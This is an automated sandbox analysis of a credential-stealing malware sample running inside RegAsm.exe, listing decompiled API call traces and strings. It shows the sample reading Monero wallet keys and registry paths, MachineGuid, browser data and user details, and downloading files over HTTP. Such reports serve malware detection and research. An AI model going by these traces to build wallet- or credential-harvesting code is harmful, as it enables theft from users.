                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Filelstrcpy$lstrcat$AllocCreateHeaplstrlenmemset$CloseCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                                                                                                                                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                  • API String ID: 2725398440-218353709
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004100BE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 00410106
                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410150
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041017A
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410197
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 004101C1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004101D6
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 00410256
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                  • API String ID: 404191982-3278919252
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040F6D5
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6EB
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F70D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040F74F
                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0040F888
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E19D: strlen.MSVCRT ref: 0040E1B4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040DD57: memcpy.MSVCRT ref: 0040DD77
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • N0ZWFt, xrefs: 0040F7F2, 0040F7FF
                                                                                                                                                                                                                                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F767, 0040F850
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                                                                                                                                                                                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                                  • API String ID: 3050127167-1622206642
                                                                                                                                                                                                                                                                  • Opcode ID: 3a6f7b861108cbe1819bebfe8817c2c57805d33606f5f1f7a4a4117b49b50245
                                                                                                                                                                                                                                                                  • Instruction ID: e0bb21690e5e363970e67a316829cc01213af197869752a4ae6fdd033285d198
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a6f7b861108cbe1819bebfe8817c2c57805d33606f5f1f7a4a4117b49b50245
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71517071900119AEDB24EB94DC81AEEBBB9EF44314F20017EF114B66C1DB785E88CB69
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0041052A
                                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 0041054D
                                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041057F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 004105C2
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004105C9
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004105F5
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,004262A0), ref: 00410604
                                                                                                                                                                                                                                                                    • Part of subcall function 004104EA: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104FB
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410623
                                                                                                                                                                                                                                                                    • Part of subcall function 0041113A: malloc.MSVCRT ref: 00411148
                                                                                                                                                                                                                                                                    • Part of subcall function 0041113A: strncpy.MSVCRT ref: 00411158
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00410650
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                  • String ID: :\$C
                                                                                                                                                                                                                                                                  • API String ID: 688099012-3309953409
                                                                                                                                                                                                                                                                  • Opcode ID: 89df5b652768a4d5ebc43df63e68aa115dedfdfa6efa48d2347cbc64f04f470a
                                                                                                                                                                                                                                                                  • Instruction ID: b2eb4e8e05693d3b84408a222d57ab8de69b0fcebb35d55d3b5720af2a3aff1c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89df5b652768a4d5ebc43df63e68aa115dedfdfa6efa48d2347cbc64f04f470a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7419075C01258AACB11EBE5DD89DEFBB7DEF46304F10006EF515B3141DA388A89CBA5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413112
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: _EH_prolog.MSVCRT ref: 00404F6D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FD0
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: StrCmpCA.SHLWAPI(?), ref: 00404FE4
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405007
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 0040503D
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405061
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040506C
                                                                                                                                                                                                                                                                    • Part of subcall function 00404F68: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040508A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413194
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004131AB
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 004131D2
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004131E7
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00413202
                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                  • API String ID: 3807055897-1526165396
                                                                                                                                                                                                                                                                  • Opcode ID: 4d9da620a1a5e0b3dcbb29c584945f551d5abd9cb9b33b934421a06b03b94a7b
                                                                                                                                                                                                                                                                  • Instruction ID: 0a2888dd45e61a418bc20ba62eaa62e8ad1303f698d7cc5800680f20278165fb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d9da620a1a5e0b3dcbb29c584945f551d5abd9cb9b33b934421a06b03b94a7b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1641B0B1904258EACB10FFA5D956BED77B4AF19308F10407FE80573682DF7C5B488A6A
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040ED54
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED98
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EE0C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EF28
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D44E: _EH_prolog.MSVCRT ref: 0040D453
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B902: _EH_prolog.MSVCRT ref: 0040B907
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000), ref: 0040EFF7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000), ref: 0040F06C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F187
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy
                                                                                                                                                                                                                                                                  • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                                                                  • API String ID: 2120869262-2697854757
                                                                                                                                                                                                                                                                  • Opcode ID: c673e401afc107d5620e588305b2e22b38672d0502b4c63b525b2a4a47dc1761
                                                                                                                                                                                                                                                                  • Instruction ID: e3df1419439a2dafc4d67f36b25ecfbea69ccfa795f8b303c49576cfea4aa723
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c673e401afc107d5620e588305b2e22b38672d0502b4c63b525b2a4a47dc1761
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9E18F71D04248AADF10EBB9D946BDDBBB4AB15308F10807EE845776C2DB38574C8BA6
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00404E0D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E5C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404E76
                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E9A
                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EE2
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404F06
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00404F20
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404F27
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404F30
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2737972104-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7133b705b4551f95528399036ae2e6112854ca6dcfe1a825456fc473669b7e6d
                                                                                                                                                                                                                                                                  • Instruction ID: d74cd6de3bd47137f9889cef4b860dedebf8a8dd5aa32f722f924b6a0cc73ebe
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7133b705b4551f95528399036ae2e6112854ca6dcfe1a825456fc473669b7e6d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F414CB1800249AFEB20EFA0DC85EEE77BDFB45304F10447AF611B2191DB385A898B65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00410483
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,>eB,?,?,00000000), ref: 0041049F
                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(>eB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 004104BE
                                                                                                                                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 004104DB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                                                  • String ID: >eB$MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                  • API String ID: 1728412123-2070272321
                                                                                                                                                                                                                                                                  • Opcode ID: 073329d90dd0b28f1282f921cc7d727825b12edff1d53cac39abc855f9e95257
                                                                                                                                                                                                                                                                  • Instruction ID: 542951808218d9f2465ed4648b59cbb1e34f36a9af0a17ea3e60233f65be3e46
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 073329d90dd0b28f1282f921cc7d727825b12edff1d53cac39abc855f9e95257
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2014F7994021DFFDB10DB90DD89EEAB7BCEB15708F5000A1B644E2052EAB45FC88B60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406269
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3869837436-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4c12af5293247d0852290e9f84aca953a0241540781a611f6511e2904149f2bb
                                                                                                                                                                                                                                                                  • Instruction ID: 35711bfacf48629fa0f29843080878ebcda73aa91c01e9433e0666b6e19ec790
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c12af5293247d0852290e9f84aca953a0241540781a611f6511e2904149f2bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5218B74900105ABDF21AFA5DC49EAF7BB9FF45710F20056EF912E62D0DB389951CB24
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 0040FFD7
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040FFDE
                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFFE
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410024
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                  • String ID: %d MB$@
                                                                                                                                                                                                                                                                  • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                                  • Opcode ID: c58ae50e157e084fb5eb09f6b26700478935f84c8f09dc0668bdf2d7ff4d155e
                                                                                                                                                                                                                                                                  • Instruction ID: eccb4bd644d002001be109ff5285c15e39b4e17480081bea73ca0ccbe80ef9ea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c58ae50e157e084fb5eb09f6b26700478935f84c8f09dc0668bdf2d7ff4d155e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF036B5600208ABEB109BA4DC4AFBE77BDE745745F440029F702E71C0DBB4D8858769
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00415DAE
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00415DDA
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415DF7
                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415E17
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00415E46
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00415E59
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2333602472-0
                                                                                                                                                                                                                                                                  • Opcode ID: 551f176c852a6deed838df927c1851d4825e24eed5c4e02a754b8116951cdeaa
                                                                                                                                                                                                                                                                  • Instruction ID: bea494da033249d0684dc301a0f0449e1b9a709c4575af1f67fa8029bea30c00
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 551f176c852a6deed838df927c1851d4825e24eed5c4e02a754b8116951cdeaa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F416DB2C4021DABDF00EFA4DC86EDE7B7DEB05304F00456AB514A2151E735ABD98BE6
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417430
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 0041743C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: LoadLibraryA.KERNEL32(The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser,0041735D), ref: 00417448
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417458
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417464
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 0041747C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 00417488
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 004174A8
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: wcslen.MSVCRT ref: 004174B2
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004174C6
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004174DD
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004174F4
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041750B
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417522
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417539
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417550
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417567
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041757E
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417595
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175AC
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175C3
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175DA
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 004175F1
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417608
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041761F
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 00417636
                                                                                                                                                                                                                                                                    • Part of subcall function 0041742B: GetProcAddress.KERNEL32 ref: 0041764D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041736F,004265B7), ref: 0040FC1E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: HeapAlloc.KERNEL32(00000000,?,?,?,0041736F,004265B7), ref: 0040FC25
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC12: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FC39
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
